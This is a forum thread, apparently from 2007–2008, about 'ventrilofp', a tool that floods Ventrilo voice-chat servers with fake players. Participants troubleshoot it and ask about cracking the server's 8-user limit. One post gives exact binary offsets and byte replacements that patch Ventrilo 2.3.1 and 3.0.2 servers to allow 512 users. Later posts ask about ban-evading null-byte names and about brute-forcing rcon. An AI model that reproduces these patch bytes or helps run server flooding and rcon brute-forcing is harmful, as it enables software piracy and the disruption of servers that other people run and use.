VentirloFP

Rappy · **Joined:** 28 Aug 2007 00:08 **Posts:** 2

Ventrilo 3.0.0 just came out, any possibilities of a new FP for it?

aluigi · **Posted:** 15 Nov 2007 10:14

Seems that you and trancemode have had the same idea at the same time (6 minutes of difference) 8-)
I go to check this new version and what is changed from the 2.x

aluigi · **Posted:** 15 Nov 2007 13:38

Ok, I have quickly tested the new 3.0 version.
The main things I have noticed are an additional handshake and layer of encryption and a small modification of the protocol.
Then seems that in LAN doesn't work, in fact it seems to use a sort of authentication with the Ventrilo master servers... strange.

For the moment I have modified a bit my ventrilofp adding the 3.0.0 protocol but naturally the protocol has not been fully implemented, so if you want to test it you can but it doesn't work:

aluigi.org/beta/ventrilofp.zip

aluigi · **Posted:** 16 Nov 2007 22:39

Anyway remember that Ventrilo uses TCP connections so my tcpfp tool can do its work here too:

tcpfp 127.0.0.1 3784

is also possible to use the -m NUM option for specifying a limit in the connections, but it not needed

infus3 · **Posted:** 28 Nov 2007 06:00

Also along the lines of Ventrilo 3, would there be any possibility of a cracked version allowing more than 8 users?

aluigi · **Posted:** 28 Nov 2007 11:58

If I'm not in error (if I remember well I already looked in this thing for curiosity in the past) the limitation is hardcoded in the executable.
I mean that there is no a simple check like "if players major than 8 quit" but ALL the buffers and structures are limited to 8 players which means that a "#define MAX_PLAYERS 8" in the source code is transformed in many differences and less memory allocated in the final executable.

Sethioz · **Posted:** 28 Nov 2007 21:02

hmm, so does the tcpfp work on it ?
and about the limitation .. basically whole program is built for 8 ? If you even manage to add more then it, then it simply doesnt work or crash ?
..i had older ventrilo, but it seemed crap:S

aluigi · **Posted:** 28 Nov 2007 23:08

it crashes because tries to access to the memory up to the 8th player which is not available

Sethioz · **Posted:** 29 Nov 2007 19:45

yeah thats what i meant. If you manage to get 9 or more then it crashes..and to prevent you basically have to rewrite whole thing ?!

aluigi · **Posted:** 29 Nov 2007 20:59

you need to increase the size of the buffers which can be problematic for global buffers (since when it ends there is other stuff and so if you want to increase the buffer you must change its location and all the times when it's called) and for stack buffers too (since the function can have multiple RETs and other checks)

Rappy · **Joined:** 28 Aug 2007 00:08 **Posts:** 2

I'm still having a bit of trouble with the ventrilo 3.0 protocols I can't seem to get anything to work. Any suggestions?

aluigi · **Posted:** 05 Dec 2007 12:01

what type of error you receive?
The centralized authorization mechanism has not been implemented yet so is only possible to phisically fill the sockets but not the players slots for the moment.

g3gg0 · **Joined:** 01 Feb 2008 22:19 **Posts:** 4

aluigi wrote:

If I'm not in error (if I remember well I already looked in this thing for curiosity in the past) the limitation is hardcoded in the executable.
I mean that there is no a simple check like "if players major than 8 quit" but ALL the buffers and structures are limited to 8 players which means that a "#define MAX_PLAYERS 8" in the source code is transformed in many differences and less memory allocated in the final executable.

hi luigi ;)

well, you are right. the 8 users are hardcoded.
there are about 6 places where the hardcoded size is used.
also the userinfos are some static aligned struct.

here is some howto if one wants to test aroud with more than just 8 users.
i moved it to some unused area to get 512 users limit

Code:

 Ventrilo v2.3.1 Linux
--------------------------


remap:
 - 'ventrilo_srv.prop',0    08174DF8  ->  08174A0A   (replace 3 times F84D1708 with 0A4A1708)
 - one useless '%s'         081751F8  ->  081749F4   (replace 1 time  F8511708 with F4491708)

  old usertable area     ->    new usertable area       |   replace all        with
                                                        |
  081960C8                     08174A20  start          |    C8601908     -> 204A1708
  081960CC                     08174A24  entry_1        |    CC601908     -> 244A1708
  081960E8                     081755F4  end            |    E8601908     -> F4551708
  081960EC                     081755F8  num_clients    |    EC601908     -> F8551708

=> 0x2F5 users!  limited to 0x200  (for checking with 3-byte opcode  "cmp dh,01")



   replacing              with
 ----------------      -------------
  CMP EDX, 08h    ->    CMP DH, 02h


[83 FA 08] 7D 0E 8B 08           replace with 80 FE 02
[83 FA 08] 7C F2 33 C0           replace with 80 FE 02
8B 15 EC 60 19 08 [83 FA 08]     replace with 80 FE 02
8B 15 EC 60 19 08 [83 FA 09]     replace with 80 FE 02

8B 15 EC 60 19 08 [83 FA 08] 0F 8E C9 00 00 00  => CMP DH, 01h!!   replace with  80 FE 01
8A 80 79 01 00 00 84 C0 74 01 [47]              => INC EDX (47) -> NOP (90)

i also started with ventrilo 3.0.2. but it is crashing when a user disconnects.
well, ok. i just looked at the disassembled code, and tried to remap the area
like i did in the old version.
but when it didnt worked on the first try, i stopped further analysis.
its for sure just some small stupid mistake.

maybe some other person is interested in analyzing and patching the code.

Code:

 Ventrilo v3.0.2 Linux
--------------------------

function:  [?]

.text:0804EA97 83 FA 08    cmp     edx, 8
[83 FA 08] 7D 0E 8B 08        -> 80 FE 02

.text:0804EAA5 83 FA 08    cmp     edx, 8
89 48 FC 83 C0 04 [83 FA 08]  -> 80 FE 02



function: ServerConnAccept

.text:0804E923  83 FA 09   cmp     edx, 9
 8B 15 E8 98 1B 08 [83 FA 09] 7C 3E -> 80 FE 02



function: check_server_limits

.text:0804EA3C 83 FA 08    cmp     edx, 8
8B 15 E8 98 1B 08 [83 FA 08]  -> 80 FE 02

.text:0804EA4E 83 FA 09    cmp     edx, 9
8B 15 E8 98 1B 08 [83 FA 09] 7C 05 -> 80 FE 02


add segment:
offset 0x30    0x17 -> 0x18  (add one segment)

append to file:
DE000000010000000300000000002008840B07000020000000000000000000000400000000000000
(segment with 0x2000 bytes data starting at offset 00070b84)
then append 0x2000 times 0x00

mapping: 

.bss:081B98C4  [usertable_start]  -> 08200000   C4981B08 -> 00002008
.bss:081B98C8  [usertable_entry1] -> 08200004   C8981B08 -> 04002008
.bss:081B98E4  [usertable_end]    -> 08201FF8   E4981B08 -> F81F2008
.bss:081B98E8  [num_users]        -> 08201FFC   E8981B08 -> FC1F2008

of course i discourage you from using a crac*ed version of ventrilo.
but it might be useful for some errrhm tests :)

aluigi · **Posted:** 08 Feb 2008 22:29

the good old Ventrilo... I think I will no longer work on it 8-)

g3gg0 · **Joined:** 01 Feb 2008 22:19 **Posts:** 4

did you investigate the v3 protocol little?
i'm thinking about doing it.

aluigi · **Posted:** 26 Feb 2008 11:24

no, I didn't investigated more, I just noticed that ventrilofp worked with this 3.0 too (naturally I exclude the centralized authorization mechanism) and so was enough 8-)

durka99 · **Joined:** 09 Mar 2008 00:25 **Posts:** 7

So it should still work right???

j.w cuz Mine doesnt seem to be working

Code:

- target:   192.168.0.192 : 3784
- activated 2.3 protocol
- use default 2.3.0 version

  Player:
- server uses version 3.0.2
- activated 3.x protocol
- set version to 3.0.0

  Player: 1/8
  Player: 1/8
  Player: 1/8
  Player: 1/8
  Player: 1/8
  Player: 1/8
  Player: 1/8
  Player: 1/8
  Player: 1/8

but no one joins :(

aluigi · **Posted:** 09 Mar 2008 00:59

Without the 3.0 challenge-response algorithm (at the moment I have zero interest on this so I doubt I will work on it, although I believe it's probably nothing complex) the filling of the server is not complete as in the old 2.x version.
You can only try to fill the available socket slots using tcpfp

aluigi · **Posted:** 28 Mar 2008 22:41

I did it.
The new version will be released tomorrow when I will finish to check for possible compatibility issues, anyway for the moment the centralized handshake has been fully emulated and in LAN works perfectly.

aluigi · **Posted:** 29 Mar 2008 14:12

version 0.2.4 is out

MadHatter · **Joined:** 20 Nov 2007 05:07 **Posts:** 6

Hey Luigi, I've found a slight bug in the updated ventrilofp. What happens is the program attempts to send connections to the slightly newer servers using version 3.0.2, which don't accept clients using the 3.0.0 version (What you have set for connections to 3.x server). In case I wasn't clear enough, I've attached a photo.

aluigi · **Posted:** 01 Apr 2008 13:11

the error you see in the server is normal, ventrilofp first tries using version 2.3.0 and then switches to 3.x if the server requires it.
The fact that ventrilofp has been not able to join the fake player is caused by something else.
I need to know the exact configuration of the server for replicating the problem.

MadHatter · **Joined:** 20 Nov 2007 05:07 **Posts:** 6

Well, the server was just the default Windows i386 server. I made no alterations to the config. I also tried altering the source of ventrilofp some (which is why you see 3.0.2 instead of 3.x in the picture) but to no avail. Previously the ventrilofp.exe worked just fine (a few days ago), but now, even on unprotected server that allow duplicate IP's, the players can't connect.

aluigi · **Posted:** 02 Apr 2008 15:02

ok bug solved in the new 0.2.5 version, it was a 16 bit value which I setted to 3 while it needed to be 1... anyway I have not checked better this thing so REPORT any other similar problem with other servers!

I have also fixed a memory consumption bug in fastsend and added the possibility to set the phonetic, so when you join a server the other players should hear what you typed there.

RiosJoe · **Joined:** 06 Apr 2008 07:11 **Posts:** 2

Code:

- Ventrilo 3 server handshake:
ce 2f b5 f2 cf ca 6d 4e 77 6f 24 da ef d0 62 99   ./....mNwo$...b.

- server full or players_per_IP limit reached or something wrong
- wait to retry:

Any idea's?

aluigi · **Posted:** 06 Apr 2008 14:50

ok, I have definitely solved this problem in version 0.2.6
For more info check the handshake_num variable in ventrilo3_handshake.c

RiosJoe · **Joined:** 06 Apr 2008 07:11 **Posts:** 2

Code:

- Ventrilo 3 server handshake:
e6 72 cc 1c ab 9c 2b b3 1c c2 26 8a 81 bd c9 ad   .r....+...&.....

- server full or players_per_IP limit reached or something wrong
- wait to retry:
  1
  Player: 11/100
- server full or players_per_IP limit reached or something wrong
- wait to retry:

Maybe its different per sever.

aluigi · **Posted:** 07 Apr 2008 10:07

if you are sure to have not redownloaded your cache (a common problem) I need to know the exact configuration of the server otherwise I can't replicate the problem.

DeFRaG · **Posted:** 19 Apr 2008 04:45

is it possible to use a null byte on ventrilo? like for example you could use a null byte with teamspeak and well basically it would make it so if you click on the persons name using the null byte you would get an error. it was pretty interesting and funny just thought id ask. also someone either rewritten your coding for the tspeakfp at one point so when the fake players connect it would be using the null byte so it was alot harder to ban because of the error you would get. or they some how added it into the name of the fake player which im not sure if they did.

DeFRaG · **Posted:** 19 Apr 2008 08:20

sorry for the double post but i gotta ask this.

well earlier i was messing around with the tcpfp and well i was using it for ventrilo not sure if you guys know but if you /status in your rcon while using tcpfp on the server ppl can see that you login about 100 times lol. but i was wondering is it possible to make the ventrilofp some how brute force rcon with this? like have it added into ventfp it seems pretty interesting not sure if it would work or not i just though id ask.

Luigi Auriemma

VentirloFP